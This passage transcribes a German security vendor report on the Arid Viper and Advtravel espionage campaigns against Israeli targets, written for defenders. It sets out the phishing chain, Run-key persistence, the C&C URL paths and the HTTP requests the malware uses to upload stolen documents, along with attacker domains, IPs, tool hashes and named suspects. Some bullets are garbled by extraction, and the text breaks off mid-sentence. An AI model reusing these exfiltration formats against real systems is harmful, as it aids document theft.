Operation Arid Viper whitepaper

Transcription

Operation Arid Viper whitepaper
OPERATION ARID VIPER
Davor schützt nicht einmal ein Raketenabwehrsystem
Ihr Trend Micro Team für Bedrohungsforschung
INHALT
Einleitung..................................................................................................... i
Operation Arid Viper............................................................................... 1
Ziele................................................................................................... 1
Infektionskette.................................................................................... 1
C&C-Infrastruktur............................................................................... 5
Operation Advtravel................................................................................ 9
C&C-Infrastruktur............................................................................... 9
Malware............................................................................................ 13
Opfer................................................................................................ 15
fpupdate.info Server......................................................................... 16
Opfer............................................................................................ 16
linksis.info Server......................................................................... 17
Zuordnungshinweise............................................................................ 17
Khalid Samra.................................................................................... 17
Ahmed Jmal..................................................................................... 19
Mahmoud Hashem........................................................................... 19
Dev_hima......................................................................................... 20
VIRUS_HIMA............................................................................... 24
Mohammed Khaled.......................................................................... 25
Fathy Mostafa.................................................................................. 25
Weitere Personen............................................................................. 26
Fazit.............................................................................................................ii
Literatur­hinweise........................................................................................iii
Anhang.......................................................................................................iv
TREND MICRO HAFTUNGSAUSSCHLUSS
Die in diesem Dokument bereitgestellten Informa­
tionen sind lediglich allgemeiner Natur und für Auf­
klärungs­
zwecke gedacht. Sie stellen keine Rechts­
beratung dar und sind nicht als solche auszulegen.
Die in diesem Dokument bereit­
gestellten Informa­
tionen finden womöglich nicht auf alle Sachverhalte
Anwendung und spiegeln womöglich nicht die
jüngsten Sachverhalte wider. Die Inhalte in diesem
Dokument sind ohne eine Rechtsberatung auf der
Grundlage der vorgestellten besonderen Fakten und
Umstände nicht als verlässlich oder als Hand­lungs­
anweisungen zu verstehen und nicht in anderer Weise
auszulegen. Trend Micro behält sich das Recht vor,
die Inhalte dieses Dokuments zu jeder Zeit und ohne
Vorankündigung zu ändern.
Übersetzungen in andere Sprachen sind aus­schließ­
lich als Unterstützung gedacht. Die Genauig­keit der
Übersetzung wird weder garan­tiert noch still­schwei­
gend zugesichert. Bei Fragen zur Genauigkeit einer
Übersetzung lesen Sie bitte in der offiziellen Fassung
des Dokuments in der Ursprungs­
sprache nach.
Diskre­panzen oder Abweichungen in der übersetzten
Fassung sind nicht bindend und haben im Hinblick auf
Compliance oder Durchsetzung keine Rechts­wirkung.
Trend Micro bemüht sich in diesem Dokument
im angemessenen Umfang um die Bereitstellung
genauer und aktueller Informationen, übernimmt
jedoch hinsichtlich Genauigkeit, Aktualität und Voll­
ständig­
keit keine Haftung und macht diesbezüglich
keine Zusicherungen. Sie erklären Ihr Einverständnis,
dass Sie dieses Dokument und seine Inhalte auf
eigene Verantwortung nutzen und sich darauf berufen.
Trend Micro übernimmt keine Gewährleistung,
weder ausdrücklich noch stillschweigend. Weder
Trend Micro noch Dritte, die an der Konzeption,
Erstellung oder Bereitstellung dieses Dokuments
beteiligt waren, haften für Folgeschäden oder
Verluste, insbesondere direkte, indirekte, besondere
oder Nebenschäden, entgangenen Gewinn oder
besondere Schäden, die sich aus dem Zugriff auf,
der Verwendung oder Unmöglichkeit der Verwendung
oder in Zusammenhang mit der Verwendung dieses
Dokuments oder aus Fehlern und Auslassungen im
Inhalt ergeben. Die Verwendung dieser Informationen
stellt die Zustimmung zur Nutzung in der vorliegenden
Form dar.
Forschungsbericht zum Betrug mit der gefälschten Banking-App in Südkrea
EINLEITUNG
Häufig engagieren sie mehrere Teams, um an
unterschiedlichen Abschnitten ihrer bösartigen
Programme zu arbeiten.
Trend Micro Forscher entdeckten eine laufende
Malware-Kampagne, die sich gegen israelische Opfer
richtet und Netzwerkinfrastrukturen in Deutschland
nutzt. Die Kampagne hat starke Verbindungen zu
arabischen Parteien im Gazastreifen und anderen
Gebieten.
Stellen wir uns die folgende rekonstruierte Situation
vor, die auf einem tatsächlichen Angriff basiert: Ein
Mitarbeiter einer israelischen staatlichen Forschungs­
einrichtung empfängt und öffnet eine äußerst gezielte
Phishing-E-Mail. Auf dem Bildschirm wird die
Wiedergabe eines pornografischen Videos gestartet,
das der Mitarbeiter rasch schließt, bevor einer seiner
Kollegen etwas davon bemerkt. Danach denkt er nicht
weiter über den Zwischenfall nach.
Minuten später erhält ein Angreifer irgendwo im Gaza­
streifen von Palästina die Nachricht, dass das System
eines neuen Opfers erfolgreich infiziert wurde. Der
Angreifer setzt die Aktion weiter fort, indem er ein
Paket mit sämtlichen interessanten Dokumenten aus
dem neu infizierten System entwendet.
Israel ist weltweit eins der am besten verteidigten
Länder, geschützt durch das legendäre Raketen­
abwehr­system „Iron Dome“. [1] All das zählt jedoch
nicht, wenn ein Angreifer – möglicherweise aus Rache
nach den israelischen Luftangriffen auf Gaza im letzten
Jahr – all diese Verteidigungsmaßnahmen umgeht,
um gezielt das Herz der israelischen Verwaltung
anzugreifen. [2]
Das Internet entwickelt sich derzeit rasant zum
Schlacht­feld für „New Age“-Kriege – ein Schauplatz
für ein neues Spiel der Weltmächte, bestehend aus
Feinden und Verbündeten. Es ist die Wiederaufnahme
des alten Spiels aus Täuschung, Fälschung und
Spionage auf der weltpolitischen Bühne. Dieses Spiel
bietet die willkommene Möglichkeit, einen Feind ohne
explizite Kriegserklärung anzugreifen, indem aus
sicherer Entfernung spioniert werden kann – und zwar
mit nur minimalen elektronischen Spuren.
Die größte Schwierigkeit für ein Sicherheits­unter­
nehmen besteht darin, die Motivation zu erkennen,
die hinter einem elektronischen Angriff steckt. In sel­
tenen Fällen decken wir Fälle staatlich gesponserter
Spionage auf. Folgende Hinweise sind besonders
nützlich, um zwischen Angreifern bzw. den Hinter­
männern höchst gezielter Angriffe und anderen Cyber­
kriminellen zu unterscheiden:
•
2
Komplexität: Einige diese äußerst ge­
zielten Angriffe sind weitaus raffinierter
als gewöhnliche cyberkriminelle Angriffe.
Regierungs­behörden mit dem erforderlichen
Personal, um Malware für diese äußerst
gezielten Angriffe zu entwickeln, perfektio­
nieren ihren Code oft über Jahre hinweg.
Natürlich stehen nicht allen Nationen die­selben
Ressourcen zur Verfügung, wenn es um die
Entwicklung von Malware geht. Tatsächlich
stehen jedem Stuxnet-Angriff Hunderte
recht einfacher Spear-Phishing-Kampagnen
gegenüber.
•
Ziele: Mittlerweile greift staatlich finanzierte
Malware gezielt Opfer an, die sich in spe­
zifische Gruppen – bestimmte Regionen oder
vertikale Industrien – unterteilen lassen. Dies
könnte ein verräterisches Zeichen dafür sein,
dass sich hinter einem äußerst gezielten
Angriff höhere Ziele als ausschließlich
Profitgier verbergen.
Darüber hinaus sollte darauf hingewiesen werden,
dass nicht alle politisch motivierten Angriffe von
den Regierungen ausgeführt werden, die davon am
wahrscheinlichsten profitieren würden. Sie können
auch das Werk von Hacktivisten, patriotischen HackerGruppen oder – noch komplizierter – von verfeindeten
Nationen sein, die Angriffe unter dem Namen der
vermeintlich Schuldigen ausführen. Willkommen in
der ausgesprochen komplexen Welt geopolitischer
Malware!
Dieser Forschungsbericht erzählt die Geschichte einer
äußerst gezielten Angriffskampagne, die eine ganze
Reihe von Alarmglocken schrillen ließ. Was wir als
„Operation Arid Viper“ bezeichnen, ist eine Kampagne,
die sich ausschließlich gegen Opfer in Israel richtet.
Dieser besondere Fall zeigte, dass nicht nur andere
Länder Israel im Visier haben, sondern auch einige
Organisationen, die sich als Gegner Israels sehen.
Wir können daher nicht ignorieren, dass dieser Angriff
möglicherweise von einer aggressiven Organisation
ausgegangen ist, die versucht, das weltpolitische
Schachbrett zu erschüttern.
Operation Arid Viper nutzt Malware, die über
Phishing-E-Mails verbreitet wird, um Dokumente auf
Zielsystemen zu entwenden. Dieser Bericht, der vom
Trend Micro Forward-Looking Threat Research Team
in Zusammenarbeit mit anderen Sicherheitsexperten
erarbeitet wurde, deckt die technischen Details der
Kampagne und ihre Ziele auf. Darüber hinaus enthält
er Informationen über eine Reihe von Personen,
die vermutlich mit der Kampagne in Verbindung
stehen. Besonderer Dank gilt dem United States
Air Force (USAF) Office of Special Investigations
für dessen Unterstützung und Kooperation in dieser
Angelegenheit.
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
OPERATION ARID VIPER
Ziele
Anhand von Trend Micro Bedrohungsdaten wurden die bisherigen Ziele
der laufenden Kampagne mit der Bezeichnung „Operation Arid Viper“
ausgemacht. Auf der Basis von IP-Adressen, die im Zusammenhang
mit Malware-Infektionen in Verbindung mit der zentralen Infrastruktur
der Kampagne standen, konnten wir folgende Ziele ermitteln: ein
Regierungsbüro, Transportservice- bzw. Infrastrukturanbieter, eine
militärische Organisation und eine akademische Einrichtung in Israel.
Zudem wurde eine akademische Einrichtung in Kuwait zusammen
mit verschiedenen anderen nicht identifizierten israelischen Personen
angegriffen.
Recherchen deckten außerdem eine interessante Twitter-Konversation
zwischen @‌Ramzi_MHADHBI, einem tunesischen Blogger, und
@‌waleedassar, einem Reverse Engineer, der zurzeit als Senior Security
Researcher beim Al Jazeera Media Network arbeitet, auf. Bei diesem
Gespräch wurden zwei der Domains erwähnt, die in Verbindung mit
Malware der Operation Arid Viper stehen. Dies spricht dafür, dass
möglicherweise eine oder beide Domains ebenfalls angegriffen wurden.
Operation Arid Viper richtete
sich gegen verschiedene
israelische Unternehmen aus
unterschiedlichen Branchen.
Infektionskette
Wie später noch deutlich wird, war es Ziel von Operation Arid
Viper, Daten von Opfern zu entwenden. Darüber hinaus wurde viel
Aufmerksamkeit auf die Eindringmethode verwendet. Die Kampagne
nutzte den gängigsten Infektionsweg gezielter Angriffe: eine einfache
Phishing-E-Mail von einem nicht existierenden Absender an einen
bestimmten Empfänger. Die E-Mails richteten sich gezielt an
Unternehmen aus verschiedenen Branchen mit einem deutlichen
Schwerpunkt auf Israel.
Die Spear-Phishing-E-Mail wurde zusammen mit einem komprimierten
Dateianhang und einem mehr oder weniger glaubwürdigen SocialTwitter-Konversation zwischen
Engineering-Trick gesendet, um Opfer zum Öffnen des Anhangs und
@‌Ramzi_MHADHBI und
zum Ausführen der eingebetteten .EXE-Datei zu bewegen. Der .RAR@‌waleedassar
Dateianhang enthält eine .SCR-Datei, die bei Ausführung zwei weitere
Dateien im infizierten System ablegt. Die eine Datei ist ein kurzes
pornografisches Video im .FLV- oder .MPG-Format, je nach untersuchtem Exemplar.
Bei der anderen Datei handelt es sich um eine Windows® Binärdatei, die das Symbol
des bekannten Internetkommunikationsprogramms Skype™ trägt.
Operation Arid Viper zeichnete sich durch eine pornografische Komponente aus,
die den Anwender von der Infektion oder der Tatsache, dass etwas Ungewöhnliches
geschah, ablenken sollte. Die E-Mails wurden an Mitarbeiter gesendet, die möglicher­
weise äußerst unangemessene Inhalte am Arbeitsplatz empfingen und daher zögern
würden, den Vorfall zu melden. Durch dieses Fehlverhalten der Opfer, nicht auf
die Bedrohung zu reagieren, konnte die primäre Malware unentdeckt bleiben. Die
Angreifer verwendeten eine besondere, erfolgversprechende und bisher unbekannte
Strategie, um Untersuchungen durch Vorfallreaktionsteams zu vermeiden.
1 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Darüber hinaus gab es Variationen bei den Spear-Phishing-Elementen
der untersuchten Angriffe, wobei die grundlegende Idee stets die­
selbe war. Alle Angriffe nutzen eine Social-Engineering-E-Mail mit
einem bösartigen Dateianhang und verfügten – wie bereits bei der
Beschreibung der Infektionskette erwähnt – über ein pornografisches
Element.
Nach Ausführung greift die Binärdatei auf einen Command-andControl (C&C)-Server zu, um sofort ein aktualisiertes Modul
herunterzuladen und zu überprüfen, ob es sich um ein bereits
bekanntes oder ein neu infiziertes System handelt. Jedem infizierten
System wird eine eindeutige Kennung zugewiesen, die den
jeweiligen Fest­platten­namen und eine bestimmte Gruppe an Zahlen
beinhaltet. Für C&C-Server werden bestimmte URLs verwendet.
Beachten Sie, wie häufig die eindeutige Kennung in sämtlichen
Kommunikationen mit C&C-Servern verwendet wird. Im Folgenden
sehen Sie Beispielbefehle für ein System mit der eindeutigen ID
VMwareVirtualIDEHardDrive—1268730784.
•
/session/aadd_rtemp.php?n=VMwareVirtualIDEHard
Drive—1268730784:
Datensatz des Systems hinzufügen oder möglicherweise
eine Kommunikationssitzung starten
•
/session/gget_rtemp.php?n=VMwareVirtualIDEHard
Drive—1268730784:
Datensatz abrufen oder möglicherweise eine
Kommunikationssitzung fortsetzen
•
/flupdate/3.html: Eine aktualisierte .EXE-Datei herunterladen
Nicht existierender Sender
einer Spear-Phishing-E-Mail
[ZENSIERT]@gmail.com
SENDET
Ursprünglicher E-MailAnhang (selbst­extra­
hierende .RAR-Datei)
ENTHÄLT
.SCR-Datei, die Dateien
in C:\i\ ablegt
LEGT AB
Ausführbare
Datei der
Haupt‑Malware
(Skype.exe und
User-Agent)
Pornografisches
(harmloses)
Video
Infektionskette von Operation
Arid Viper
Obwohl die herunterzuladende
Datei 3.html in der ursprüng­
lichen bösartigen Binärdatei
hartkodiert war, verfügt der
C&C-Server über ähnliche,
jedoch nicht vollkommen
identische Binärdateien
wie 1.html, 2.html usw. mit
fortlaufender Nummerierung.
Diese waren von Exemplar zu
Exemplar unterschiedlich. Bei
allen handelte es sich jedoch
um Base64-kodierte Strings.
Gewöhnlich stellte die Malware
außerdem den User-Agent für
die Kommunikation auf „SK“,
„Skypee“ oder „Skype“, wie im
Wireshark-Protokoll dargestellt.
User-Agent für Kommunikation laut Wireshark-Protokoll auf „SK“,
„Skypee“ oder „Skype“ eingestellt
Die zuvor erwähnten Pfade –
aadd_temp und gget_rtemp –
wichen in den verschiedenen
Exemplaren und C&C-Servern etwas voneinander ab. Das Anfrageformat war jedoch
stets identisch. Die folgende unvollständige Liste nennt einige weitere, bereits
beobachtete Pfade:
2 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
•
/new/add_tree.php?name=[SYSTEM-ID]
&date=[TODAYS DATE]
•
/new/view_flash_random.php?name=
[SYSTEM-ID]&serial=[SERIAL NUM]
•
/new/all_file_info1.php?name=[SYSTEM-ID]
&user=[NUM]&file=[DD-MM-YYYY HH‑MM.
uml]&type=msn
•
/new/update.php
•
/new/view_file_order.php?name=[SYSTEM-ID]
•
/new/view_file_up.php?name=[SYSTEM-ID]
•
/new/view_random_order.php?name=
[SYSTEM-ID]
•
/down/add_temp.php?name=[SYSTEM-ID]
•
/new/add_tuser.php?name=[SYSTEM-ID]&use
•
/new/chang_flag.php
•
/new/chang_rfflag.php
•
/new/chang_rflag.php
•
/new/all_file_info1.php?name=[SYSTEM-ID]
&user=[NUM]&file=[DD-MM-YYYY HH‑MM.
rml]&type=log
•
/new/all_file_info1.php?name=[SYSTEM-ID]
&user=[NUM]&file=[DD-MM-YYYY
HH‑MM.dll]&type=img
•
/new/all_file_info1.php?name=[SYSTEM-ID]
&user=[NUM]&file=[DD-MM-YYYY
HH‑MM.rml]&type=tree
•
/new/get_flash.php?name=[SYSTEM-ID]
&serial=[SERIAL NUM]
•
/new/n_chang_fflag.php
•
/new/get_tree.php?name=[SYSTEM-ID]
&date=[DD-MM-YYYY]
•
/mians/aadd_rtemp.php?n=[SYSTEM-ID]
•
/mians/gget_rtemp.php?n=[SYSTEM-ID]
•
/new/get_statu.php?name=[SYSTEM-ID]
•
/session/aadd_rtemp.php?n=[SYSTEM-ID]
•
new/get_flash.php?name=[SYSTEM-ID]
&serial=[SERIAL NUM]
•
/session/gget_rtemp.php?n=[SYSTEM-ID]
Wenn die Malware der zweiten Phase ausgeführt wird,
stellt sich diese selbst auf eine automatische Ausführung
bei jedem Systemneustart ein – getarnt als Internet­
kommunikationssoftware. Diese Aktion wird durch einen
herkömmlichen Autostart-Registrierungsschlüssel wie
HKCU\SOFTWARE\Microsoft\Windows\AktuelleVersion\Run—
“Skype = <Pfad\Name.exe”> realisiert. Er enthält den Pfad
und Namen der im Registrierungsschlüssel abgelegten .EXEDatei. Zudem kopiert er sich selbst über einen hartkodierten
Pfad in %Systemlaufwerk%\Programme\Messenger. Die
Malware nutzte „Skype“ nicht nur in der Registrierung, sondern
fälschte außerdem häufig auch das Skype-Symbol. Alle bisher
untersuchten Malware-Exemplare verfügten über Abschnitte
ausführbarer Dateien in arabischer Sprache.
Die Malware meldet sich an der C&C-Konsole an, indem sie
ein äußerst spezifisches PHP-Script auf dem C&C-Server
aufruft: /products/add_user.php?name=VMwareVirtualID
EHardDrive—1268730784&user=38. Die Zahl, die für den
Benutzerparameter erstellt wird – 38 in diesem Beispiel –
wurde vom Malware-Client zur Identifizierung der Sitzung
gewählt. Dann durchsucht die Malware die gesamte Festplatte
nach Dokumenten mit den Dateiendungen .DOC, .XLS, .PPT
und .TXT. Jedes gefundene Dokument wird dem C&C-Server
unter Verwendung dieses Formats gemeldet:
GET /products/file_order3.php?name=VMwareVirtualIDEH
ardDrive—1268730784&path=C:/Documents%20and%20
Settings/user/Templates/winword.doc.
3 | Seite
Das Wireshark-Protokoll (oben)
zeigt die Dateien, die die Malware
an einen C&C-Server sendet.
Der Assemblercode-Abschnitt
(unten) sucht nach zu stehlenden
.XLS‑Dateien.
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Der C&C-Server antwortet umgehend, ob das jeweilige Dokument von Interesse
ist oder nicht. Diese Entscheidung beruht wahrscheinlich auf einer serverseitigen,
hartkodierten schwarzen Liste, um zu verhindern, dass der Client Standardvorlagen
und allgemeine readme.txt-Dateien sendet. Der Server fordert außerdem möglichst
nur Dateien an, die nicht bereits während anderer Sitzungen entwendet wurden, um
Dateiduplikate zu vermeiden. Der Server gibt zwei mögliche Antworten aus:
•
Antwort bei einem interessanten Dokument:
HTTP/1.1 200 OK
Date: Thu, 02 Oct 2014 14:49:45 GMT
Server: Apache/2.4.10 (Unix) OpenSSL/1.0.1e-fips mod_
bwlimited/1.4
X-Powered-By: PHP/5.5.16
Transfer-Encoding: chunked
Content-Type: text/html
4
6
done
0
•
Antwort bei einem uninteressanten Dokument:
HTTP/1.1 200 OK
Date: Thu, 02 Oct 2014 14:49:23 GMT
Server: Apache/2.4.10 (Unix) OpenSSL/1.0.1e-fips mod_
bwlimited/1.4
X-Powered-By: PHP/5.5.16
Transfer-Encoding: chunked
Content-Type: text/html
2
2
Danach führt der Client alle relevanten, zu stehlenden Dokumente auf. Diese werden
in einer 0.txt-Datei komprimiert und über eine POST-Anfrage wie POST /products/
fupdates.php auf den C&C-Server hochgeladen. Diese Anfrage beinhaltet einen
einzigen POST-Parameter, der als GET-Parameter wie account=38&name=
VMwareVirtualIDEHardDrive—1268730784&folder=tree&fname=02-10-2014
10-50.rml&s=<base64-file> formatiert ist.
Der Server nutzt vermutlich den Wert account, der mit dem zuvor erwähnten Wert
user identisch ist. So können Sitzungen nachverfolgt werden, in denen bestimmte
Dateien hochgeladen werden. Der Parameter fname ist der Name der .ZIP-Datei und
enthält ein bestimmtes Datum und eine bestimmte Uhrzeit. Die Datei 0.txt wird nach
dem Upload gelöscht.
Zum Abschluss des Datei-Uploads sendet der Client die Anfrage /‌products/all_file_
info1.php?name=VMwareVirtualIDEHardDrive—1268730784&user=38&file=
02-10-2014%2010-50.rml&type=tree, um sicherzustellen, dass der Vorgang
erfolgreich durchgeführt wurde.
Mit einer einzigen Ausführung kann die Malware also Dokumente von infizierten
Systemen entwenden. Nach Ausführung sämtlicher Routinen fragt die Malware
automatisch beim C&C-Server nach, ob der Pfad /products/get_statu.php?name=
VMwareVirtualIDEHardDrive—1268730784 weiter ausgeführt werden soll. Beinhaltet
die Antwort den Wert run11, soll die Ausführung fortgesetzt werden. Bei der Antwort
stop wird die Ausführung deaktiviert – wahrscheinlich, um uninteressante Systeme
nicht zu infizieren.
4 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
C&C-Infrastruktur
Anhand eines ersten Malware-Exemplars und des entsprechenden C&CServers durchsuchten wir die internen Datenbanken von Trend Micro, um
eine Liste mit ähnlichen Malware-Exemplaren zu erstellen, die denselben
Server kontaktieren. In allen Fällen zeigte die Malware im Wesentlichen
dasselbe bereits erwähnte Verhalten.
Der C&C-Server, der zuerst entdeckt wurde, war pstcmedia.com. Eine
schnelle Suche ergab, dass außerdem die Website mixedwork.com,
die auch auf der IP-Adresse 188.40.81.136 gehostet wurde, als C&CServer diente. Obwohl die Website pstcmedia.com die IP-Adressen
wechselte, schien mixedwork.com auf dieser ursprünglichen IP-Adresse
zu verbleiben. Andere von pstcmedia.com genutzte IP-Adressen lauteten
unter anderem 192.254.132.26 und 54.255.143.112. Die zweite IPAdresse wurde von anderen Sicherheitsforschern entlarvt.
Um weitere Domains zu finden, die möglicherweise an derselben
Kampagne beteiligt sind oder von denselben Tätern genutzt werden,
wurde eine Untersuchung von Domain-Registrierungsdaten durchgeführt.
Der C&C-Server, der pstcmedia.‌com verwendete, war unter der privaten
E-Mail-Adresse khalid.samraa@gmail.‌com registriert. Weitere Details
hierzu enthält der Abschnitt „Zuordnungshinweise“.
Die Hauptseite von mixedwork.com beinhaltete außerdem eine „Köder­
umleitung“ zu der rechtmäßigen Website http://channel9.msdn.‌com/
events/mix. Erwähnenswert ist jedoch, dass auf der 404-Fehlerseite als
Website-Administrator die E-Mail-Adresse [email protected]
genannt wird.
Durch eine eingehende Untersuchung von Trend Micro™ Smart Protection
Network™ Feedback zu Netzwerkaktivitäten, die mit den zuvor erwähnten
URL-Pfaden vergleichbar sind, konnten wir erkennen, wo sich die
folgenden aktiven C&C-Server zu verschiedenen Zeitpunkten befanden:
•
ahmedfaiez.info
•
flushupdate.com
•
flushupate.com
•
ineltdriver.info
•
mediahitech.com
Die ersten drei Server wurden bereits alle irgendwann einmal auf
denselben IP-Adressen 188.40.75.132 und 188.40.106.84 mit Standort
in Hetzner, Deutschland, gehostet. Eine genauere Untersuchung der
ersten IP-Adresse ergab, dass diese neben verschiedenen anderen auch
die zwei Domains advtravel.info und fpupdate.info hostet. Diese beiden
Domains haben eindeutige Verbindungen zu cyberkriminellen Aktivitäten –
wenn auch nicht unbedingt zu der hier untersuchten Kampagne.
Bei genauerer Betrachtung der beiden C&C-Server zeigte sich, dass
diese falsch konfiguriert waren und das Erstellen von Verzeichnislisten
zuließen. Sie speicherten große Datenmengen von Opfern, die im
Abschnitt „Operation Advtravel“ näher analysiert werden.
5 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Maltego®-Karte mit Beziehungen, die zwischen Websites, IP-Adressen und Servern in den beschriebenen
Kampagnen erkannt wurden
Die wesentlichen C&C-Server von Operation Arid Viper sind so konfiguriert, dass
Besucher auf ihren Hauptseiten zu anderen Webseiten weitergeleitet wurden
(siehe unten stehende Tabelle).
C&C-Server
Website, auf die weitergeleitet wird
ahmedfaiez.info
Zeigt nur das Wort „test“ an
flushupate.com
helpx.adobe.com/flash-player.html
flushupdate.com
get.adobe.com/flashplayer
ineltdriver.com
downloadcenter.intel.com/default.aspx
mediahitech.info
Wird nicht mehr aufgelöst
mixedwork.com
visitmix.com/work
plmedgroup.com
palmgroupasia.com
pstcmedia.com
Geparkte Seite
6 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Eine Prüfung der Domain Name System (DNS) Start of Authority (SOA)- und WhoisDatensätze jedes identifizierten C&C-Servers erbrachte verschiedene weitere
interessante E-Mail-Adressen. Weitere Details hierzu finden Sie im Abschnitt
„Zuordnungshinweise“. Die folgende Tabelle zeigt unsere Ergebnisse.
C&C-Server
advtravel.info*
E-Mail-Adressen aus DNS SOAund Whois-Datensätzen
[email protected]
[email protected]
ahmedfaiez.info
[email protected]
flushupate.com
[email protected]
flushupdate.com
[email protected]
[email protected]
fpupdate.info*
[email protected]
ineltdriver.com
[email protected]
mediahitech.info
[email protected]
mixedwork.com
[email protected]
plmedgroup.com
[email protected]
pstcmedia.com
[email protected]
Beachten Sie, dass die durch ein Sternchen (*) gekennzeichneten C&C-Servernamen Teil
einer separaten Kampagne (Advtravel) sind.
7 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
Q1Q2Q3 Q4
Erstes gefundenes
Exemplar User-Agent:
Httpcall, MyProgramm
Neue User-Agents:
SK, sk, Skypee, Skype
Q1Q2 Q3 Q4
Kampagne
fortgesetzt
Starke Zunahme
von Angriffen
Malware mit neuen
Binärdateien, die jedoch
weiterhin dieselbe
Backend-Infrastruktur
nutzten
Wenig Malware-Aktivitäten
aufgrund der Sommerferien
Die Hashwerte schädlicher Binärdateien und die entsprechenden C&C-Server zusammen mit dem
jeweiligen Erkennungsdatum ermöglichten uns die Darstellung von Angriffen auf einer Zeitleiste.
Diese zeigt die zeitliche Entwicklung von Operation Arid Viper.
8 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
OPERATION ADVTRAVEL
Die laufende Operation Advtravel unterscheidet sich von der Operation Arid Viper
durch die verwendete Malware, die Opfer und die Zuordnungsinformationen.
Dennoch gibt es gewisse Parallelen zur Operation Arid Viper, die uns dazu veranlasst
haben, die Operation Advtravel in diesen Forschungsbericht aufzunehmen. Die hinter
dieser Kampagne stehenden Täter haben möglicherweise Verbindungen zu den
Cyberkriminellen der Operation Arid Viper. Beispiele:
•
Sie nutzten gemeinsame C&C-Server.
•
Sie verwendeten dieselben E-Mail-Adressen, um ihre Domains advtravel.‌info,
fpupdate.‌info und linksis.‌info zu registrieren.
•
Die Täter hatten Verbindungen zum Gazastreifen.
C&C-Infrastruktur
Während unserer Untersuchungen stießen wir auf einen C&C-Server
von Advtravel, der dieselbe Infrastruktur wie Operation Arid Viper
nutzte. Besonders interessant ist, dass auf der Website advtravel.‌info
das Stammverzeichnis des Servers für die Öffentlichkeit vollständig
zugänglich blieb. Diese Tatsache zusammen mit einigen anderen
cyberkriminellen Aktivitäten, die im Abschnitt „Zuordnungshinweise“
näher erläutert werden, bewegten uns zu der Annahme, dass die
Advtravel-Angreifer weniger erfahren sind als die Kriminellen, die sich
hinter der Operation Arid Viper verbergen.
Öffentlich zugängliches
Stammverzeichnis der
Advtravel-Website
Eine Analyse von Daten aus dem Dezember 2014 zeigt, dass auf das
C&C-Serververzeichnis von Advtravel öffentlich zugegriffen werden
konnte. Im Rahmen unserer Untersuchung konnten wir daher Kopien des gesamten
Inhalts herunterladen, bevor die Betreiber des C&C-Servers ihren Fehler bemerkten
und den Zugriff sperrten. Frühere Datenversionen aus dem September 2014 wurden
ebenfalls heruntergeladen.
Das advtravel.‌info-Verzeichnis verfügte über verschiedene Dateien und Ordner.
Obwohl es uns nicht möglich war, jede Datei eingehend zu analysieren, werden im
Folgenden einige Details zu den interessantesten Komponenten näher erläutert:
•
B1312.zip: Hierbei handelt es sich um eine komprimierte Sicherungsdatei
(1,4 GB) von sämtlichen Dateien auf dem C&C-Server. Da diese Datei auf
dem Server verblieb, konnten wir einen Einblick in den Code der von den
Angreifern verwendeten .PHP-Dateien erlangen.
•
/apps/: Dieses Hauptverzeichnis enthält gestohlene Daten von Opfern
zusammen mit verschiedenen PHP-Skripten zum Hochladen der
Daten auf den Server. Das verwendete Format war /apps/A[3 nums]X/
[COMPUTERNAME_USERNAME], wobei A[3 nums]X für eine bestimmte
untergeordnete Kampagne steht, während /[COMPUTERNAME_
USERNAME] ein eindeutiges Opfer identifiziert. Die drei Ziffern im
Ordnerformat lassen vermuten, dass es sich hier um die Angabe des
jeweiligen Monats im Jahr handelt, da die Zahlen von 001 bis 012 variierten.
Eine nähere Untersuchung der Termine, an denen die Daten gestohlen
wurden, widerlegte jedoch diese Theorie.
9 | Seite
© 2015 Trend Micro Incorporated
Forschungsbericht zur Operation Arid Viper
ŠŠ DrivesList.txt: Liste sämtlicher
Laufwerke eines infizierten Systems.
Eine umfangreiche Analyse jeder Datei
auf dem Server würde den Rahmen
dieses Forschungsberichts überschreiten.
Im Folgenden finden Sie jedoch nähere
Informationen zu den interessantesten
Komponenten:
ŠŠ FileList.txt: Liste von Dateien in einem
Verzeichnis eines infizierten Systems –
häufig, wo die Malware ausgeführt
wurde.
ƒƒ /apps/A[3 nums]X/ison.on: Zeitpunkt
im Format tt-mm-jjjj-hh-mm-ss, an dem
gestohlene Daten zuletzt hochgeladen
wurden.
ŠŠ pdata.txt: Liste gestohlener WebsiteAnmeldedaten.
ŠŠ webrowser.txt: Liste gestohlener
Webbrowser-Anmeldedaten.
ƒƒ /apps/A[3 nums]X/data/: Enthält
Screenshots von infizierten Systemen
zusammen mit folgenden Dateien, deren
Präsenz je nach Opfer variierte:
ŠŠ wifi.txt: Liste gestohlener Anmelde­
daten für WLAN-Verbindungen.
ŠŠ workdata.txt: Beinhaltet Infektions­
datum, Betriebssystem, Benutzer­
domain­name und die Zeile
APP_‌PATH=, die angibt, in welchem
Verzeichnis die Malware installiert
wurde.
ŠŠ allips.txt: Beinhaltet die lokalen und
externen IP-Adressen von Opfern.
ŠŠ CurrentProcess.txt: Liste der
laufenden Prozesse auf infizierten
Systemen.
ŠŠ Winkey.log: Protokoll mit Tastatur­
eingaben von Opfern.
ŠŠ cmpinf.txt: Beinhaltet Infektionsdatum,
Betriebssystem, Benutzerdomainname
und Benutzername.
ŠŠ Weitere Dateien, die von der Malware
aufgrund einer manuellen Anforderung
des Angreifers direkt vom System
des Opfers gestohlen wurden. Hierzu
zählen Dokumente, Bilder usw.
ŠŠ downinf.txt: Beinhaltet Infektions­
datum, Betriebssystem, Benutzer­
domainname, Benutzername und
Status wie „Download Complete :).“
ƒƒ /data/: Beinhaltet drei .EXE-Dateien (siehe folgende
Tabelle).
Dateiname
getchr.exe
getcmppass.
exe
MD5-Hash
Zweck
77f590608eadcbbcc07de8d26607611f
Legt HKTL_
PASSVIEW ab
6d63f1c6962f290156c6459d1158a715
Hacking-Tool,
das Browser- und
WLAN-Netzwerk­
kennwörter
entwendet
ccaac14d265915f4fdc6229ec6c9e854
log.exe
b9b763980e33e390480c4a0d7c63adec
Protokolliert
Tastatur­eingaben
Index mit über 400 infizierten
